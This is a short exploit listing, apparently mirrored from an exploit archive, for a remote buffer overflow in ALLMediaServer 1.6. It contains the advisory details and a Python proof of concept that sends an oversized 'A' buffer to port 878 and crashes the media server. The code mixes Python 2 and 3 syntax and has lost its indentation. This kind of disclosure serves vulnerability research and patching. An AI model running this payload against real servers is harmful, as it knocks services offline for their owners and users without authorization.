Exploit for ALLMediaServer 1.6 Remote Buffer Overflow

## https://sploitus.com/exploit?id=PACKETSTORM:166465
# Exploit Title: ALLMediaServer 1.6 Remote Buffer Overflow  
# Discovered by: Yehia Elghaly  
# Discovered Date: 2022-03-25  
# Vendor Homepage: https://www.allmediaserver.org/  
# Software Link : https://www.allmediaserver.org/LiveUpdate/ALLMediaServer.exe  
# Tested Version: 1.6  
# Vulnerability Type: Buffer Overflow (DoS) Remote  
# Tested on OS: Windows 7 x86 - Windows 10 x64  
  
# Description: ALLMediaServer 1.6 Remote Buffer Overflow  
  
# Steps to reproduce:  
# 1. - ALLMediaServer 1.6 listening on port 888 or can be changed to 878  
# 2. - Run the Script from remote TCP/IP  
# 3. - Mediaserver.exe Crashed  
  
  
import socket  
  
print("######################################################")  
print("# ALLMediaServer 1.6 Remote (BUffer Overflow) #")  
print("# -------------------------- #")  
print("# BY Yehia Elghaly #")  
print("######################################################")  
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
  
try:  
s.connect(('192.168.1.99', 878))  
evilbuffer = "A" *1800  
s.sendall(evilbuffer)  
data = s.recv(1024)  
s.close()  
print "Media is Out"  
except socket.error, msg:  
print ""  
print "Couldnt connect with Mediaserver - Crashed"